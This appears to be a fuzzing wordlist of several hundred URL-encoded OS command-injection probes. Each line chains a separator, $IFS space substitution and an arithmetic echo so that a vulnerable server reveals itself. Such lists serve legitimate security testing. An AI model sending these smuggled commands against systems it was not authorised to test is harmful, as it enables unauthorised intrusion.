+os-command-injection,'"%7Cecho$IFSFIANHU$((22%2B49))$(echo$IFSFIANHU)FIANHU%7C' +os-command-injection,'"%7C%7Cecho$IFSCBHHKP$((85%2B54))$(echo$IFSCBHHKP)CBHHKP%7C' +os-command-injection,'|echo$IFSLCSZUM$((46%2B15))$(echo$IFSLCSZUM)LCSZUM' +os-command-injection,'|%20echo%20DLVBOK$((16%2B62))$(echo%20DLVBOK)DLVBOK' +os-command-injection,';echo$IFSOQQLKY$((10%2B54))$(echo$IFSOQQLKY)OQQLKY' +os-command-injection,'&echo$IFSMHSVGL$((14%2B50))$(echo$IFSMHSVGL)MHSVGL' +os-command-injection,'|echo$IFSNPYJMP$((96%2B63))$(echo$IFSNPYJMP)NPYJMP' +os-command-injection,'||echo$IFSDZTQUV$((58%2B75))$(echo$IFSDZTQUV)DZTQUV' +os-command-injection,'&&echo$IFSCOIZAX$((91%2B92))$(echo$IFSCOIZAX)COIZAX' +os-command-injection,'%0aecho$IFSILXOOR$((23%2B61))$(echo$IFSILXOOR)ILXOOR' +os-command-injection,'%3Becho$IFSWAGECK$((2%2B54))$(echo$IFSWAGECK)WAGECK' +os-command-injection,'%26echo$IFSBQOVXE$((69%2B56))$(echo$IFSBQOVXE)BQOVXE' +os-command-injection,'%26%26echo$IFSESILOB$((37%2B51))$(echo$IFSESILOB)ESILOB' +os-command-injection,'%7Cecho$IFSUJPLGH$((62%2B6))$(echo$IFSUJPLGH)UJPLGH' +os-command-injection,'%7C%7Cecho$IFSULGQGO$((89%2B48))$(echo$IFSULGQGO)ULGQGO' +os-command-injection,'echo$IFSLIXPWR$((69%2B26))$(echo$IFSLIXPWR)LIXPWR'' +os-command-injection,'%20echo%20EMRSDD$((80%2B35))$(echo%20EMRSDD)EMRSDD'' +os-command-injection,';echo$IFSOLQCLP$((7%2B9))$(echo$IFSOLQCLP)OLQCLP'' +os-command-injection,'&echo$IFSUHFGHJ$((52%2B93))$(echo$IFSUHFGHJ)UHFGHJ'' +os-command-injection,'|echo$IFSTYVVOX$((65%2B44))$(echo$IFSTYVVOX)TYVVOX'' +os-command-injection,'||echo$IFSCQTNFT$((87%2B14))$(echo$IFSCQTNFT)CQTNFT'' +os-command-injection,'&&echo$IFSCWFCPC$((35%2B74))$(echo$IFSCWFCPC)CWFCPC'' +os-command-injection,'%0aecho$IFSBUIOLU$((83%2B61))$(echo$IFSBUIOLU)BUIOLU'' +os-command-injection,'%3Becho$IFSSUZDDM$((32%2B20))$(echo$IFSSUZDDM)SUZDDM'' +os-command-injection,'%26echo$IFSLHKOZD$((2%2B55))$(echo$IFSLHKOZD)LHKOZD'' +os-command-injection,'%26%26echo$IFSWAEWHA$((84%2B51))$(echo$IFSWAEWHA)WAEWHA'' +os-command-injection,'%7Cecho$IFSFUOWKT$((11%2B83))$(echo$IFSFUOWKT)FUOWKT'' +os-command-injection,'%7C%7Cecho$IFSDPGMPX$((72%2B63))$(echo$IFSDPGMPX)DPGMPX'' +os-command-injection,'echo$IFSAUYTPO$((72%2B52))$(echo$IFSAUYTPO)AUYTPO"' +os-command-injection,'%20echo%20GVYWYM$((61%2B13))$(echo%20GVYWYM)GVYWYM"' +os-command-injection,';echo$IFSSNFHZG$((95%2B62))$(echo$IFSSNFHZG)SNFHZG"' +os-command-injection,'&echo$IFSFMZXIF$((30%2B31))$(echo$IFSFMZXIF)FMZXIF"' +os-command-injection,'|echo$IFSMNZFPI$((24%2B76))$(echo$IFSMNZFPI)MNZFPI"' +os-command-injection,'||echo$IFSKPSLUB$((16%2B33))$(echo$IFSKPSLUB)KPSLUB"' +os-command-injection,'&&echo$IFSHHBLVW$((31%2B45))$(echo$IFSHHBLVW)HHBLVW"' +os-command-injection,'%0aecho$IFSBRJHDI$((98%2B17))$(echo$IFSBRJHDI)BRJHDI"' +os-command-injection,'%3Becho$IFSLIWOMV$((30%2B61))$(echo$IFSLIWOMV)LIWOMV"' +os-command-injection,'%26echo$IFSJQVAMD$((56%2B15))$(echo$IFSJQVAMD)JQVAMD"' +os-command-injection,'%26%26echo$IFSVHKGMR$((26%2B28))$(echo$IFSVHKGMR)VHKGMR"' +os-command-injection,'%7Cecho$IFSJJIMGS$((39%2B63))$(echo$IFSJJIMGS)JJIMGS"' +os-command-injection,'%7C%7Cecho$IFSLSGJRQ$((28%2B34))$(echo$IFSLSGJRQ)LSGJRQ"' +os-command-injection,'echo$IFSSWOEAI$((89%2B70))$(echo$IFSSWOEAI)SWOEAI' +os-command-injection,'%20echo%20WKKPJF$((94%2B30))$(echo%20WKKPJF)WKKPJF' +os-command-injection,';echo$IFSWUQPLA$((73%2B27))$(echo$IFSWUQPLA)WUQPLA' +os-command-injection,'&echo$IFSBXBVOS$((78%2B10))$(echo$IFSBXBVOS)BXBVOS' +os-command-injection,'|echo$IFSLXLUOD$((68%2B51))$(echo$IFSLXLUOD)LXLUOD' +os-command-injection,'||echo$IFSDPTPFZ$((37%2B20))$(echo$IFSDPTPFZ)DPTPFZ' +os-command-injection,'&&echo$IFSRIRRVG$((43%2B47))$(echo$IFSRIRRVG)RIRRVG' +os-command-injection,'%0aecho$IFSHSVHKA$((85%2B77))$(echo$IFSHSVHKA)HSVHKA' +os-command-injection,'%3Becho$IFSCIDNHM$((30%2B88))$(echo$IFSCIDNHM)CIDNHM' +os-command-injection,'%26echo$IFSTYUNYQ$((1%2B27))$(echo$IFSTYUNYQ)TYUNYQ' +os-command-injection,'%26%26echo$IFSQLXSPL$((22%2B2))$(echo$IFSQLXSPL)QLXSPL' +os-command-injection,'%7Cecho$IFSTXNBJZ$((0%2B67))$(echo$IFSTXNBJZ)TXNBJZ' +os-command-injection,'%7C%7Cecho$IFSGHEBEC$((72%2B52))$(echo$IFSGHEBEC)GHEBEC' +os-command-injection,'echo$IFSUMOYPF$((66%2B31))$(echo$IFSUMOYPF)UMOYPF//' +os-command-injection,'%20echo%20VRYUIC$((62%2B65))$(echo%20VRYUIC)VRYUIC//' +os-command-injection,';echo$IFSEMLBQR$((31%2B56))$(echo$IFSEMLBQR)EMLBQR//' +os-command-injection,'&echo$IFSOCUZHX$((85%2B82))$(echo$IFSOCUZHX)OCUZHX//' +os-command-injection,'|echo$IFSEZAPVW$((95%2B18))$(echo$IFSEZAPVW)EZAPVW//' +os-command-injection,'||echo$IFSIWAFLA$((17%2B83))$(echo$IFSIWAFLA)IWAFLA//' +os-command-injection,'&&echo$IFSAKRGLM$((80%2B60))$(echo$IFSAKRGLM)AKRGLM//' +os-command-injection,'%0aecho$IFSOIOFXV$((43%2B15))$(echo$IFSOIOFXV)OIOFXV//' +os-command-injection,'%3Becho$IFSNGWBSU$((48%2B3))$(echo$IFSNGWBSU)NGWBSU//' +os-command-injection,'%26echo$IFSGSBMEB$((40%2B21))$(echo$IFSGSBMEB)GSBMEB//' +os-command-injection,'%26%26echo$IFSDTKGOW$((36%2B42))$(echo$IFSDTKGOW)DTKGOW//' +os-command-injection,'%7Cecho$IFSOHOTGG$((99%2B58))$(echo$IFSOHOTGG)OHOTGG//' +os-command-injection,'%7C%7Cecho$IFSIODRIH$((80%2B87))$(echo$IFSIODRIH)IODRIH//' +os-command-injection,'echo$IFSUPLBDT$((24%2B49))$(echo$IFSUPLBDT)UPLBDT\' +os-command-injection,'%20echo%20TXNMBR$((39%2B88))$(echo%20TXNMBR)TXNMBR\' +os-command-injection,';echo$IFSUAHSRY$((0%2B55))$(echo$IFSUAHSRY)UAHSRY\' +os-command-injection,'&echo$IFSYVPJGQ$((92%2B10))$(echo$IFSYVPJGQ)YVPJGQ\' +os-command-injection,'|echo$IFSEBBOEZ$((37%2B91))$(echo$IFSEBBOEZ)EBBOEZ\' +os-command-injection,'||echo$IFSVSCFSB$((3%2B2))$(echo$IFSVSCFSB)VSCFSB\' +os-command-injection,'&&echo$IFSQXNYWT$((50%2B82))$(echo$IFSQXNYWT)QXNYWT\' +os-command-injection,'%0aecho$IFSLBYCDI$((79%2B92))$(echo$IFSLBYCDI)LBYCDI\' +os-command-injection,'%3Becho$IFSDXMRQT$((52%2B34))$(echo$IFSDXMRQT)DXMRQT\' +os-command-injection,'%26echo$IFSJREIYL$((10%2B95))$(echo$IFSJREIYL)JREIYL\' +os-command-injection,'%26%26echo$IFSHCFVYN$((99%2B28))$(echo$IFSHCFVYN)HCFVYN\' +os-command-injection,'%7Cecho$IFSSUHYSU$((21%2B53))$(echo$IFSSUHYSU)SUHYSU\' +os-command-injection,'%7C%7Cecho$IFSALLVVO$((50%2B22))$(echo$IFSALLVVO)ALLVVO\' +os-command-injection,'echo$IFSLGTLKK$((65%2B27))$(echo$IFSLGTLKK)LGTLKK&' +os-command-injection,'%20echo%20GBSQUY$((50%2B66))$(echo%20GBSQUY)GBSQUY&' +os-command-injection,';echo$IFSZQHRWI$((42%2B35))$(echo$IFSZQHRWI)ZQHRWI&' +os-command-injection,'&echo$IFSZJOTOV$((13%2B82))$(echo$IFSZJOTOV)ZJOTOV&' +os-command-injection,'|echo$IFSTNAENV$((39%2B94))$(echo$IFSTNAENV)TNAENV&' +os-command-injection,'||echo$IFSJVYMEK$((76%2B35))$(echo$IFSJVYMEK)JVYMEK&' +os-command-injection,'&&echo$IFSQDJECI$((28%2B96))$(echo$IFSQDJECI)QDJECI&' +os-command-injection,'%0aecho$IFSHJRQCU$((0%2B63))$(echo$IFSHJRQCU)HJRQCU&' +os-command-injection,'%3Becho$IFSIOLXIC$((8%2B16))$(echo$IFSIOLXIC)IOLXIC&' +os-command-injection,'%26echo$IFSSCHCVM$((93%2B31))$(echo$IFSSCHCVM)SCHCVM&' +os-command-injection,'%26%26echo$IFSBGVLEQ$((60%2B59))$(echo$IFSBGVLEQ)BGVLEQ&' +os-command-injection,'%7Cecho$IFSEDDVWA$((82%2B98))$(echo$IFSEDDVWA)EDDVWA&' +os-command-injection,'%7C%7Cecho$IFSKNLSBT$((88%2B60))$(echo$IFSKNLSBT)KNLSBT&' +os-command-injection,'echo$IFSQGZFHM$((40%2B15))$(echo$IFSQGZFHM)QGZFHM|' +os-command-injection,'%20echo%20EIFXCG$((20%2B68))$(echo%20EIFXCG)EIFXCG|' +os-command-injection,';echo$IFSCKYHAJ$((39%2B53))$(echo$IFSCKYHAJ)CKYHAJ|' +os-command-injection,'&echo$IFSOUBRDR$((47%2B29))$(echo$IFSOUBRDR)OUBRDR|' +os-command-injection,'|echo$IFSUFZURL$((39%2B84))$(echo$IFSUFZURL)UFZURL|' +os-command-injection,'||echo$IFSWOBQDK$((42%2B28))$(echo$IFSWOBQDK)WOBQDK|' +os-command-injection,'&&echo$IFSSUJVLB$((59%2B86))$(echo$IFSSUJVLB)SUJVLB|' +os-command-injection,'%0aecho$IFSSNIVPI$((9%2B71))$(echo$IFSSNIVPI)SNIVPI|' +os-command-injection,'%3Becho$IFSMKSRXM$((30%2B19))$(echo$IFSMKSRXM)MKSRXM|' +os-command-injection,'%26echo$IFSIRVZDV$((73%2B9))$(echo$IFSIRVZDV)IRVZDV|' +os-command-injection,'%26%26echo$IFSWBIFGE$((67%2B32))$(echo$IFSWBIFGE)WBIFGE|' +os-command-injection,'%7Cecho$IFSREQHRF$((82%2B40))$(echo$IFSREQHRF)REQHRF|' +os-command-injection,'%7C%7Cecho$IFSEJZUFX$((9%2B88))$(echo$IFSEJZUFX)EJZUFX|' +os-command-injection,'echo$IFSRHERRD$((18%2B82))$(echo$IFSRHERRD)RHERRD%27' +os-command-injection,'%20echo%20HXCOZT$((48%2B89))$(echo%20HXCOZT)HXCOZT%27' +os-command-injection,';echo$IFSSYZLKW$((13%2B55))$(echo$IFSSYZLKW)SYZLKW%27' +os-command-injection,'&echo$IFSWBYLPB$((80%2B54))$(echo$IFSWBYLPB)WBYLPB%27' +os-command-injection,'|echo$IFSGFLOUA$((7%2B71))$(echo$IFSGFLOUA)GFLOUA%27' +os-command-injection,'||echo$IFSBCZPXJ$((39%2B35))$(echo$IFSBCZPXJ)BCZPXJ%27' +os-command-injection,'&&echo$IFSGWXAGT$((52%2B45))$(echo$IFSGWXAGT)GWXAGT%27' +os-command-injection,'%0aecho$IFSRZZKHJ$((26%2B66))$(echo$IFSRZZKHJ)RZZKHJ%27' +os-command-injection,'%3Becho$IFSIEOSEZ$((86%2B74))$(echo$IFSIEOSEZ)IEOSEZ%27' +os-command-injection,'%26echo$IFSRGSNFF$((14%2B60))$(echo$IFSRGSNFF)RGSNFF%27' +os-command-injection,'%26%26echo$IFSNSUHXN$((87%2B12))$(echo$IFSNSUHXN)NSUHXN%27' +os-command-injection,'%7Cecho$IFSVJNFLD$((16%2B2))$(echo$IFSVJNFLD)VJNFLD%27' +os-command-injection,'%7C%7Cecho$IFSWJYCOX$((21%2B64))$(echo$IFSWJYCOX)WJYCOX%27' +os-command-injection,'echo$IFSQYFURG$((23%2B53))$(echo$IFSQYFURG)QYFURG%22' +os-command-injection,'%20echo%20JCFSBN$((7%2B70))$(echo%20JCFSBN)JCFSBN%22' +os-command-injection,';echo$IFSBUCQOY$((75%2B89))$(echo$IFSBUCQOY)BUCQOY%22' +os-command-injection,'&echo$IFSINJILM$((12%2B86))$(echo$IFSINJILM)INJILM%22' +os-command-injection,'|echo$IFSMNCLPS$((56%2B63))$(echo$IFSMNCLPS)MNCLPS%22' +os-command-injection,'||echo$IFSMWNDWI$((5%2B99))$(echo$IFSMWNDWI)MWNDWI%22' +os-command-injection,'&&echo$IFSXITZZU$((72%2B57))$(echo$IFSXITZZU)XITZZU%22' +os-command-injection,'%0aecho$IFSKGOAAS$((28%2B98))$(echo$IFSKGOAAS)KGOAAS%22' +os-command-injection,'%3Becho$IFSHLZSZR$((18%2B53))$(echo$IFSHLZSZR)HLZSZR%22' +os-command-injection,'%26echo$IFSFZIREE$((3%2B27))$(echo$IFSFZIREE)FZIREE%22' +os-command-injection,'%26%26echo$IFSBFEQYV$((65%2B19))$(echo$IFSBFEQYV)BFEQYV%22' +os-command-injection,'%7Cecho$IFSXHRRAU$((47%2B66))$(echo$IFSXHRRAU)XHRRAU%22' +os-command-injection,'%7C%7Cecho$IFSVNAEYF$((4%2B92))$(echo$IFSVNAEYF)VNAEYF%22' +os-command-injection,'echo$IFSMYDTOQ$((99%2B59))$(echo$IFSMYDTOQ)MYDTOQ%5C%5C' +os-command-injection,'%20echo%20MIBJNK$((69%2B50))$(echo%20MIBJNK)MIBJNK%5C%5C' +os-command-injection,';echo$IFSKUMZWI$((52%2B68))$(echo$IFSKUMZWI)KUMZWI%5C%5C' +os-command-injection,'&echo$IFSRXZUMT$((27%2B20))$(echo$IFSRXZUMT)RXZUMT%5C%5C' +os-command-injection,'|echo$IFSGQAGTE$((24%2B60))$(echo$IFSGQAGTE)GQAGTE%5C%5C' +os-command-injection,'||echo$IFSEWIIAA$((5%2B86))$(echo$IFSEWIIAA)EWIIAA%5C%5C' +os-command-injection,'&&echo$IFSHBSRNA$((99%2B81))$(echo$IFSHBSRNA)HBSRNA%5C%5C' +os-command-injection,'%0aecho$IFSWNSKHN$((91%2B97))$(echo$IFSWNSKHN)WNSKHN%5C%5C' +os-command-injection,'%3Becho$IFSXCIDGL$((84%2B77))$(echo$IFSXCIDGL)XCIDGL%5C%5C' +os-command-injection,'%26echo$IFSTBOHOL$((39%2B63))$(echo$IFSTBOHOL)TBOHOL%5C%5C' +os-command-injection,'%26%26echo$IFSMEDCEY$((8%2B25))$(echo$IFSMEDCEY)MEDCEY%5C%5C' +os-command-injection,'%7Cecho$IFSZVMYPN$((92%2B94))$(echo$IFSZVMYPN)ZVMYPN%5C%5C' +os-command-injection,'%7C%7Cecho$IFSLZMNQW$((6%2B85))$(echo$IFSLZMNQW)LZMNQW%5C%5C' +os-command-injection,'echo$IFSUBGQBR$((73%2B83))$(echo$IFSUBGQBR)UBGQBR%2F%2F' +os-command-injection,'%20echo%20XRKWTL$((1%2B66))$(echo%20XRKWTL)XRKWTL%2F%2F' +os-command-injection,';echo$IFSMTRJCW$((52%2B99))$(echo$IFSMTRJCW)MTRJCW%2F%2F' +os-command-injection,'&echo$IFSNRXRKE$((21%2B36))$(echo$IFSNRXRKE)NRXRKE%2F%2F' +os-command-injection,'|echo$IFSNUKWZR$((1%2B54))$(echo$IFSNUKWZR)NUKWZR%2F%2F' +os-command-injection,'||echo$IFSCQDQPG$((96%2B92))$(echo$IFSCQDQPG)CQDQPG%2F%2F' +os-command-injection,'&&echo$IFSGTBDWG$((18%2B89))$(echo$IFSGTBDWG)GTBDWG%2F%2F' +os-command-injection,'%0aecho$IFSOVTGKS$((3%2B77))$(echo$IFSOVTGKS)OVTGKS%2F%2F' +os-command-injection,'%3Becho$IFSOTOVJM$((53%2B74))$(echo$IFSOTOVJM)OTOVJM%2F%2F' +os-command-injection,'%26echo$IFSUUYWYN$((46%2B27))$(echo$IFSUUYWYN)UUYWYN%2F%2F' +os-command-injection,'%26%26echo$IFSLQSHYA$((83%2B67))$(echo$IFSLQSHYA)LQSHYA%2F%2F' +os-command-injection,'%7Cecho$IFSIBAZCJ$((13%2B42))$(echo$IFSIBAZCJ)IBAZCJ%2F%2F' +os-command-injection,'%7C%7Cecho$IFSQFSVNV$((60%2B49))$(echo$IFSQFSVNV)QFSVNV%2F%2F' +os-command-injection,'echo$IFSPNBSWR$((27%2B39))$(echo$IFSPNBSWR)PNBSWR%26' +os-command-injection,'%20echo%20ZTYATW$((99%2B18))$(echo%20ZTYATW)ZTYATW%26' +os-command-injection,';echo$IFSSKFBVG$((56%2B51))$(echo$IFSSKFBVG)SKFBVG%26' +os-command-injection,'&echo$IFSPNMRRI$((20%2B12))$(echo$IFSPNMRRI)PNMRRI%26' +os-command-injection,'|echo$IFSZRNWFA$((82%2B53))$(echo$IFSZRNWFA)ZRNWFA%26' +os-command-injection,'||echo$IFSZFIGIN$((20%2B19))$(echo$IFSZFIGIN)ZFIGIN%26' +os-command-injection,'&&echo$IFSCPFUWZ$((25%2B32))$(echo$IFSCPFUWZ)CPFUWZ%26' +os-command-injection,'%0aecho$IFSNWIALT$((43%2B48))$(echo$IFSNWIALT)NWIALT%26' +os-command-injection,'%3Becho$IFSIKLHQK$((57%2B99))$(echo$IFSIKLHQK)IKLHQK%26' +os-command-injection,'%26echo$IFSRAALVW$((18%2B87))$(echo$IFSRAALVW)RAALVW%26' +os-command-injection,'%26%26echo$IFSGNWSGN$((55%2B55))$(echo$IFSGNWSGN)GNWSGN%26' +os-command-injection,'%7Cecho$IFSUUEUUP$((8%2B33))$(echo$IFSUUEUUP)UUEUUP%26' +os-command-injection,'%7C%7Cecho$IFSYCIWOC$((49%2B44))$(echo$IFSYCIWOC)YCIWOC%26' +os-command-injection,'echo$IFSCOBXOA$((38%2B15))$(echo$IFSCOBXOA)COBXOA%7C' +os-command-injection,'%20echo%20MUBTOH$((84%2B39))$(echo%20MUBTOH)MUBTOH%7C' +os-command-injection,';echo$IFSVQMZED$((6%2B60))$(echo$IFSVQMZED)VQMZED%7C' +os-command-injection,'&echo$IFSUVSLMN$((90%2B46))$(echo$IFSUVSLMN)UVSLMN%7C' +os-command-injection,'|echo$IFSCSPCGY$((33%2B53))$(echo$IFSCSPCGY)CSPCGY%7C' +os-command-injection,'||echo$IFSJYWQAM$((97%2B96))$(echo$IFSJYWQAM)JYWQAM%7C' +os-command-injection,'&&echo$IFSRRGUBD$((41%2B37))$(echo$IFSRRGUBD)RRGUBD%7C' +os-command-injection,'%0aecho$IFSOIFCVY$((56%2B63))$(echo$IFSOIFCVY)OIFCVY%7C' +os-command-injection,'%3Becho$IFSZULPXH$((28%2B66))$(echo$IFSZULPXH)ZULPXH%7C' +os-command-injection,'%26echo$IFSRSDEJN$((15%2B54))$(echo$IFSRSDEJN)RSDEJN%7C' +os-command-injection,'%26%26echo$IFSRIODOR$((41%2B80))$(echo$IFSRIODOR)RIODOR%7C' +os-command-injection,'%7Cecho$IFSLAITXQ$((45%2B1))$(echo$IFSLAITXQ)LAITXQ%7C' +os-command-injection,'%7C%7Cecho$IFSAEFKTR$((17%2B29))$(echo$IFSAEFKTR)AEFKTR%7C' +os-command-injection,'&echo$IFSQLXHQO$((79%2B66))$(echo$IFSQLXHQO)QLXHQO' +os-command-injection,'&%20echo%20MFHLGK$((15%2B22))$(echo%20MFHLGK)MFHLGK' +os-command-injection,';echo$IFSTLVRXR$((1%2B4))$(echo$IFSTLVRXR)TLVRXR' +os-command-injection,'&echo$IFSSSWXIY$((27%2B62))$(echo$IFSSSWXIY)SSWXIY' +os-command-injection,'|echo$IFSWWTABV$((78%2B81))$(echo$IFSWWTABV)WWTABV' +os-command-injection,'||echo$IFSPYNPEK$((48%2B2))$(echo$IFSPYNPEK)PYNPEK' +os-command-injection,'&&echo$IFSVGQLPU$((4%2B29))$(echo$IFSVGQLPU)VGQLPU' +os-command-injection,'%0aecho$IFSKTAVMG$((29%2B10))$(echo$IFSKTAVMG)KTAVMG' +os-command-injection,'%3Becho$IFSAMABXP$((6%2B24))$(echo$IFSAMABXP)AMABXP' +os-command-injection,'%26echo$IFSNHKZXU$((79%2B34))$(echo$IFSNHKZXU)NHKZXU' +os-command-injection,'%26%26echo$IFSKNHRIG$((80%2B9))$(echo$IFSKNHRIG)KNHRIG' +os-command-injection,'%7Cecho$IFSUNCOLW$((89%2B19))$(echo$IFSUNCOLW)UNCOLW' +os-command-injection,'%7C%7Cecho$IFSKJHMXN$((3%2B73))$(echo$IFSKJHMXN)KJHMXN' +os-command-injection,'echo$IFSPHZRPA$((83%2B65))$(echo$IFSPHZRPA)PHZRPA'' +os-command-injection,'%20echo%20VDKKTU$((48%2B39))$(echo%20VDKKTU)VDKKTU'' +os-command-injection,';echo$IFSVMHPMF$((49%2B68))$(echo$IFSVMHPMF)VMHPMF'' +os-command-injection,'&echo$IFSDMXXTC$((63%2B90))$(echo$IFSDMXXTC)DMXXTC'' +os-command-injection,'|echo$IFSLITPAE$((90%2B42))$(echo$IFSLITPAE)LITPAE'' +os-command-injection,'||echo$IFSHBKZPS$((90%2B74))$(echo$IFSHBKZPS)HBKZPS'' +os-command-injection,'&&echo$IFSKGICZJ$((97%2B57))$(echo$IFSKGICZJ)KGICZJ'' +os-command-injection,'%0aecho$IFSAPAMDC$((36%2B45))$(echo$IFSAPAMDC)APAMDC'' +os-command-injection,'%3Becho$IFSZZSYFZ$((36%2B96))$(echo$IFSZZSYFZ)ZZSYFZ'' +os-command-injection,'%26echo$IFSHYWHUO$((82%2B84))$(echo$IFSHYWHUO)HYWHUO'' +os-command-injection,'%26%26echo$IFSAHQKXM$((2%2B20))$(echo$IFSAHQKXM)AHQKXM'' +os-command-injection,'%7Cecho$IFSDJDWOB$((53%2B10))$(echo$IFSDJDWOB)DJDWOB'' +os-command-injection,'%7C%7Cecho$IFSJHTHVW$((39%2B26))$(echo$IFSJHTHVW)JHTHVW'' +os-command-injection,'echo$IFSNCOJPQ$((15%2B89))$(echo$IFSNCOJPQ)NCOJPQ"' +os-command-injection,'%20echo%20PHHQZJ$((49%2B63))$(echo%20PHHQZJ)PHHQZJ"' +os-command-injection,';echo$IFSVABEPU$((8%2B54))$(echo$IFSVABEPU)VABEPU"' +os-command-injection,'&echo$IFSMONACC$((64%2B29))$(echo$IFSMONACC)MONACC"' +os-command-injection,'|echo$IFSTCSNMN$((49%2B88))$(echo$IFSTCSNMN)TCSNMN"' +os-command-injection,'||echo$IFSYTRRVT$((47%2B76))$(echo$IFSYTRRVT)YTRRVT"' +os-command-injection,'&&echo$IFSUGIZFE$((95%2B79))$(echo$IFSUGIZFE)UGIZFE"' +os-command-injection,'%0aecho$IFSJCTEQY$((49%2B31))$(echo$IFSJCTEQY)JCTEQY"' +os-command-injection,'%3Becho$IFSLWOCMM$((20%2B40))$(echo$IFSLWOCMM)LWOCMM"' +os-command-injection,'%26echo$IFSNKAEHH$((28%2B48))$(echo$IFSNKAEHH)NKAEHH"' +os-command-injection,'%26%26echo$IFSAHYRFK$((59%2B15))$(echo$IFSAHYRFK)AHYRFK"' +os-command-injection,'%7Cecho$IFSQIUHMW$((18%2B27))$(echo$IFSQIUHMW)QIUHMW"' +os-command-injection,'%7C%7Cecho$IFSKELZXS$((60%2B60))$(echo$IFSKELZXS)KELZXS"' +os-command-injection,'echo$IFSHIVKNH$((59%2B63))$(echo$IFSHIVKNH)HIVKNH' +os-command-injection,'%20echo%20GBXOPJ$((13%2B32))$(echo%20GBXOPJ)GBXOPJ' +os-command-injection,';echo$IFSGBSBJK$((78%2B77))$(echo$IFSGBSBJK)GBSBJK' +os-command-injection,'&echo$IFSJUJDFI$((75%2B24))$(echo$IFSJUJDFI)JUJDFI' +os-command-injection,'|echo$IFSCYOSPJ$((41%2B88))$(echo$IFSCYOSPJ)CYOSPJ' +os-command-injection,'||echo$IFSPQBYOG$((45%2B3))$(echo$IFSPQBYOG)PQBYOG' +os-command-injection,'&&echo$IFSWQDKJH$((20%2B60))$(echo$IFSWQDKJH)WQDKJH' +os-command-injection,'%0aecho$IFSXOCRRA$((3%2B1))$(echo$IFSXOCRRA)XOCRRA' +os-command-injection,'%3Becho$IFSVTOBEN$((34%2B25))$(echo$IFSVTOBEN)VTOBEN' +os-command-injection,'%26echo$IFSSXZPOT$((38%2B66))$(echo$IFSSXZPOT)SXZPOT' +os-command-injection,'%26%26echo$IFSGEDMFF$((95%2B24))$(echo$IFSGEDMFF)GEDMFF' +os-command-injection,'%7Cecho$IFSPCVHGX$((0%2B12))$(echo$IFSPCVHGX)PCVHGX' +os-command-injection,'%7C%7Cecho$IFSXSJZOO$((37%2B56))$(echo$IFSXSJZOO)XSJZOO' +os-command-injection,'echo$IFSCMWXRB$((87%2B22))$(echo$IFSCMWXRB)CMWXRB//' +os-command-injection,'%20echo%20KRHFKC$((96%2B42))$(echo%20KRHFKC)KRHFKC//' +os-command-injection,';echo$IFSXLBAJP$((6%2B21))$(echo$IFSXLBAJP)XLBAJP//' +os-command-injection,'&echo$IFSUPQDIN$((21%2B80))$(echo$IFSUPQDIN)UPQDIN//' +os-command-injection,'|echo$IFSMCYFYC$((94%2B33))$(echo$IFSMCYFYC)MCYFYC//' +os-command-injection,'||echo$IFSWYWPXY$((38%2B95))$(echo$IFSWYWPXY)WYWPXY//' +os-command-injection,'&&echo$IFSVJEYML$((92%2B5))$(echo$IFSVJEYML)VJEYML//' +os-command-injection,'%0aecho$IFSRWHBOB$((34%2B55))$(echo$IFSRWHBOB)RWHBOB//' +os-command-injection,'%3Becho$IFSWWQHXI$((34%2B88))$(echo$IFSWWQHXI)WWQHXI//' +os-command-injection,'%26echo$IFSXQTVXE$((32%2B91))$(echo$IFSXQTVXE)XQTVXE//' +os-command-injection,'%26%26echo$IFSMLKYIC$((73%2B57))$(echo$IFSMLKYIC)MLKYIC//' +os-command-injection,'%7Cecho$IFSTILOLK$((60%2B88))$(echo$IFSTILOLK)TILOLK//' +os-command-injection,'%7C%7Cecho$IFSAFCKFD$((42%2B76))$(echo$IFSAFCKFD)AFCKFD//' +os-command-injection,'echo$IFSDMXBXH$((83%2B95))$(echo$IFSDMXBXH)DMXBXH\' +os-command-injection,'%20echo%20WGOISG$((75%2B94))$(echo%20WGOISG)WGOISG\' +os-command-injection,';echo$IFSGJTRRT$((27%2B79))$(echo$IFSGJTRRT)GJTRRT\' +os-command-injection,'&echo$IFSIDNISX$((2%2B59))$(echo$IFSIDNISX)IDNISX\' +os-command-injection,'|echo$IFSBHTKLO$((25%2B57))$(echo$IFSBHTKLO)BHTKLO\' +os-command-injection,'||echo$IFSKDHDGC$((60%2B80))$(echo$IFSKDHDGC)KDHDGC\' +os-command-injection,'&&echo$IFSHDXHXA$((99%2B37))$(echo$IFSHDXHXA)HDXHXA\' +os-command-injection,'%0aecho$IFSDQGTJY$((5%2B21))$(echo$IFSDQGTJY)DQGTJY\' +os-command-injection,'%3Becho$IFSGCRBKK$((37%2B88))$(echo$IFSGCRBKK)GCRBKK\' +os-command-injection,'%26echo$IFSTZBZPJ$((19%2B93))$(echo$IFSTZBZPJ)TZBZPJ\' +os-command-injection,'%26%26echo$IFSHWUDRE$((0%2B26))$(echo$IFSHWUDRE)HWUDRE\' +os-command-injection,'%7Cecho$IFSHJFTBK$((77%2B76))$(echo$IFSHJFTBK)HJFTBK\' +os-command-injection,'%7C%7Cecho$IFSWNQFEN$((48%2B59))$(echo$IFSWNQFEN)WNQFEN\' +os-command-injection,'echo$IFSFOGUBG$((54%2B25))$(echo$IFSFOGUBG)FOGUBG&' +os-command-injection,'%20echo%20THSJII$((27%2B68))$(echo%20THSJII)THSJII&' +os-command-injection,';echo$IFSONOVRU$((18%2B41))$(echo$IFSONOVRU)ONOVRU&' +os-command-injection,'&echo$IFSPTCLJM$((60%2B39))$(echo$IFSPTCLJM)PTCLJM&' +os-command-injection,'|echo$IFSCYPEHE$((10%2B73))$(echo$IFSCYPEHE)CYPEHE&' +os-command-injection,'||echo$IFSLRYRKA$((33%2B67))$(echo$IFSLRYRKA)LRYRKA&' +os-command-injection,'&&echo$IFSVGHYXY$((50%2B76))$(echo$IFSVGHYXY)VGHYXY&' +os-command-injection,'%0aecho$IFSZUCAWY$((35%2B43))$(echo$IFSZUCAWY)ZUCAWY&' +os-command-injection,'%3Becho$IFSQSYGGO$((28%2B83))$(echo$IFSQSYGGO)QSYGGO&' +os-command-injection,'%26echo$IFSNWCZGN$((26%2B20))$(echo$IFSNWCZGN)NWCZGN&' +os-command-injection,'%26%26echo$IFSSGSOLC$((27%2B7))$(echo$IFSSGSOLC)SGSOLC&' +os-command-injection,'%7Cecho$IFSQBNKUQ$((13%2B79))$(echo$IFSQBNKUQ)QBNKUQ&' +os-command-injection,'%7C%7Cecho$IFSVKQXGG$((70%2B99))$(echo$IFSVKQXGG)VKQXGG&' 